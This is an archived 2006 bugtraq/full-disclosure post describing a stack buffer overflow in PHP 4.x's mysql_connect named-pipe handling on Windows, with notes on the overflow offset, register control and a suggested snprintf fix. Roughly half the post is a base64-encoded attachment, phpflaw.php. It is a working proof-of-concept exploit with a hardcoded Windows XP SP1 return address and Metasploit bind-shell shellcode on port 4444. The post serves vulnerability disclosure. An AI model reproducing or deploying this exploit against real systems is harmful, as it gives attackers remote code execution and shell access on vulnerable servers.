[41981] in bugtraq
Windows PHP 4.x "0-day" buffer overflow
daemon@ATHENA.MIT.EDU (mercenary@hushmail.com)
Thu Jan 5 22:04:52 2006
Message-Id: <200601050352.k053qtgl081037@mailserver2.hushmail.com>
Date: Wed, 4 Jan 2006 19:52:52 -0800
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Cc:
From: <mercenary@hushmail.com>
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="Hush_boundary-43bc98147defb"
--Hush_boundary-43bc98147defb
Content-type: text/plain
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Buffer Overflow in PHP MySQL functions
I. RISK
Low - Remote code execution on some systems
The function is not normaly exposed to external users via input data
II. AFFECTED VERSIONS
4.x Branch under Windows
III. BACKGROUND
PHP contains many built-in functions to allow a developer to
interface with MySQL servers. One of these, mysql_connect()
contains functionality to allow a user to connect via named pipes
to a server.
IV. DESCRIPTION
The format of the mysql_connect function is as follows:
mysql_connect(host, username);
The host field can accept a host in the following format when PHP
is used on a Windows system:
"hostname:/pipe"
Where "pipe" is the named pipe to use. Within the internal code,
this pipe name is later copied into a 257 byte internal character
buffer. By supplying a long pipe variable, we are able to preform a
classical stack based buffer overflow attack. From
\ext\mysql\libmysql\libmysql.c line 216:
HANDLE create_named_pipe(NET *net, uint connect_timeout, char
**arg_host,
char **arg_unix_socket)
{
[...]
char szPipeName [ 257 ];
[...]
sprintf( szPipeName, "\\\\%s\\pipe\\%s", host, unix_socket);
The variable unix_socket is the value of the host string after the
trailing colon (:), if it exists.
Because we will be overflowing several pointers, the address of a
valid memory location must also be written to memory 4 bytes after
our replacement EIP. When our EIP is restored, ESI will contain a
pointer to the value of the "username" variable. This can be used
as a location to store our shellcode, as it is a reliable location.
V. EXPLOIT
This exploit was designed to work with PHP versions 4.3.10 and
4.4.0 under Windows XP SP 1. If another operating system is used,
the replacement EIP must be changed.
The replacement EIP is written 261 bytes into our string. For this
exploit, I used a CALL ESI from ws2_32.dll from Windows XP SP1.
The replacement ESI is simply the base of the PHP image. Locations
after this address will be overwritten with some internal data.
Our shellcode is written into the $user variable. $two is used to
prevent $user from being truncated with a MySQL error message.
VI. WORKAROUND
None.
VII. FIX
The length of unix_socket should be verified prior to use. In
addition, the string should be formatted using a safe function such
as snprintf, followed by a hardcoded null terminator.
VIII. POC
POC is attached.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkO8lv4ACgkQLpU3lrW2nNMlTACfeYj28WH+qaJRr+UJ41wVUkfSHd8A
niKUfNuCT9LgoX8fjWb7oi2W5QTj
=QoFC
-----END PGP SIGNATURE-----
--Hush_boundary-43bc98147defb
Content-type: application/octet-stream; name="phpflaw.php"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="phpflaw.php"
PD9waHANCg0KLy9FeHBsb2l0IGZvcg0KLy8JQXBhY2hlLzEuMy4zMw0KLy8JUEhQLzQuNC4wDQov
L1dpbmRvd3Mgb25seQ0KDQokZWlwID0gIjcxQUI1NjUxIjsgIC8vRUlQIC0gQ0FMTCBFU0kgZnJv
bSBXaW5zb2NrIDIuMCB3czJfMzIuZGxsIHY1LjEuMjYwMC4wDQokZXNpID0gIjEwMDAwMDAwIjsg
IC8vRVNJIC0gVGVtcG9yYXJ5LiBUaGUgbWVtb3J5IHVuZGVyIHRoaXMgbG9jYXRpb24gd2lsbCBi
ZSB0cmFzaGVkLg0KDQovL01ldGFzcGxvaXQgd2luMzIgYmluZCBzaGVsbCBvbiBwb3J0IDQ0NDQN
Ci8vVGhyZWFkIGV4aXQgbWV0aG9kLCBubyBmaWx0ZXINCiRzaGVsbGNvZGUgPSBwYWNrKCJIKiIs
ImZjNmFlYjRkZThmOWZmZmZmZjYwOGI2YzI0MjQ4YjQ1M2M4YjdjMDU3ODAxZWY4YjRmMTg4YjVm
MjAwMWViNDk4YjM0OGIwMWVlMzFjMDk5YWM4NGMwNzQwN2MxY2EwZDAxYzJlYmY0M2I1NDI0Mjg3
NWU1OGI1ZjI0MDFlYjY2OGIwYzRiOGI1ZjFjMDFlYjAzMmM4Yjg5NmMyNDFjNjFjMzMxZGI2NDhi
NDMzMDhiNDAwYzhiNzAxY2FkOGI0MDA4NWU2ODhlNGUwZWVjNTBmZmQ2NjY1MzY2NjgzMzMyNjg3
NzczMzI1ZjU0ZmZkMDY4Y2JlZGZjM2I1MGZmZDY1Zjg5ZTU2NjgxZWQwODAyNTU2YTAyZmZkMDY4
ZDkwOWY1YWQ1N2ZmZDY1MzUzNTM1MzUzNDM1MzQzNTNmZmQwNjY2ODExNWM2NjUzODllMTk1Njhh
NDFhNzBjNzU3ZmZkNjZhMTA1MTU1ZmZkMDY4YTRhZDJlZTk1N2ZmZDY1MzU1ZmZkMDY4ZTU0OTg2
NDk1N2ZmZDY1MDU0NTQ1NWZmZDA5MzY4ZTc3OWM2Nzk1N2ZmZDY1NWZmZDA2NjZhNjQ2NjY4NjM2
ZDg5ZTU2YTUwNTkyOWNjODllNzZhNDQ4OWUyMzFjMGYzYWFmZTQyMmRmZTQyMmM5MzhkN2EzOGFi
YWJhYjY4NzJmZWIzMTZmZjc1NDRmZmQ2NWI1NzUyNTE1MTUxNmEwMTUxNTE1NTUxZmZkMDY4YWRk
OTA1Y2U1M2ZmZDY2YWZmZmYzN2ZmZDA4YjU3ZmM4M2M0NjRmZmQ2NTJmZmQwNjhlZmNlZTA2MDUz
ZmZkNmZmZDAiKTsNCg0KLy9FbmRpYW4gY29udmVyc2lvbg0KJGVpcCA9IHN1YnN0cigkZWlwLCA2
LCAyKSAuIHN1YnN0cigkZWlwLCA0LCAyKSAuIHN1YnN0cigkZWlwLCAyLCAyKSAuIHN1YnN0cigk
ZWlwLCAwLCAyKTsNCiRlc2kgPSBzdWJzdHIoJGVzaSwgNiwgMikgLiBzdWJzdHIoJGVzaSwgNCwg
MikgLiBzdWJzdHIoJGVzaSwgMiwgMikgLiBzdWJzdHIoJGVzaSwgMCwgMik7DQoNCiRvdmVyZmxv
d3N0cmluZyA9ICJsb2NhbGhvc3Q6LyI7DQokb3ZlcmZsb3dzdHJpbmcgLj0gIlhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFgiOw0KJG92ZXJmbG93c3RyaW5nIC49IHBhY2soIkgqIiwkZWlwKTsJLy9FSVAN
CiRvdmVyZmxvd3N0cmluZyAuPSBwYWNrKCJIKiIsJGVzaSk7CS8vRVNJDQokb3ZlcmZsb3dzdHJp
bmcgLj0gIi8iOw0KDQovL0lmIHdlIGRvbid0IGRlZmluZSB0aGlzLCBvdXIgc2hlbGxjb2RlIGdl
dHMgdHJ1bmNhdGVkDQokdHdvID0gIkFBQUFBQUFBQUEiOw0KDQpteXNxbF9jb25uZWN0KCRvdmVy
Zmxvd3N0cmluZywgJHNoZWxsY29kZSk7DQoNCj8+
--Hush_boundary-43bc98147defb
Content-type: text/plain; name="phpflaw.php.sig"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="phpflaw.php.sig"
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NCkNoYXJzZXQ6IFVURjgNClZlcnNpb246IEh1
c2ggMi40DQoNCndrWUVBQkVDQUFZRkFrTzhsc3dBQ2drUUxwVTNsclcybk5NVGN3Q2ZWL1J0VDZU
TVQySmxpUzN1WGQ1b3N1N2cvSGdBDQpvSXhWV1VVOHF4ajRueFIwWFJSVVp0QlVuUVlhDQo9NkVv
RA0KLS0tLS1FTkQgUEdQIFNJR05BVFVSRS0tLS0tDQo=
--Hush_boundary-43bc98147defb--
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
